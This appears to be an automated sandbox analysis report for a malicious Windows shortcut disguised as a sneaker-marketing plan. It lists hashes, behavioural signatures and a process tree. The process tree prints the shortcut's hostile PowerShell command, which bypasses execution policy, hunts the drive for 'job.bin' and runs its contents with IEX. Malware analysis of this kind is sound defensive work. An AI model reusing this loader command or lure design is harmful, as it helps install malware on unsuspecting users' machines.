Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-12-2024 02:07
Static task
static1
Behavioral task
behavioral1
Sample
Creative_Brift_Marketing/Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Creative_Brift_Marketing/Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Creative_Brift_Marketing/Potential products want to increase sales/job.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Creative_Brift_Marketing/Potential products want to increase sales/job.ps1
Resource
win10v2004-20241007-en
General
-
Target
Creative_Brift_Marketing/Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk
-
Size
2KB
-
MD5
d555393c916ab9e4e58f027550375e2b
-
SHA1
a63e4defb613ee8e3543bdb43046d727710e65a0
-
SHA256
4d6eb5362d88fbc0d72285c12538b7233529f2ced117aa07bb6d2cd22a6c3db1
-
SHA512
ab6712f292f132631b92c183f694ee4637e64ac02ed71c72a03a8344ac6bb7c5ecac703676a23706259e6528fd0a95573bdb4de820bbf589c4fc4c9d898f0e4b
Malware Config
Signatures
-
pid Process 2760 powershell.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2760 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2760 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2896 wrote to memory of 2848 2896 cmd.exe 32 PID 2896 wrote to memory of 2848 2896 cmd.exe 32 PID 2896 wrote to memory of 2848 2896 cmd.exe 32 PID 2848 wrote to memory of 2760 2848 cmd.exe 33 PID 2848 wrote to memory of 2760 2848 cmd.exe 33 PID 2848 wrote to memory of 2760 2848 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Creative_Brift_Marketing\Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Get-ChildItem -Path 'C:\' -Filter 'job.bin' -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { IEX (Get-Content $_.FullName -Raw) }"2⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Get-ChildItem -Path 'C:\' -Filter 'job.bin' -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { IEX (Get-Content $_.FullName -Raw) }"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-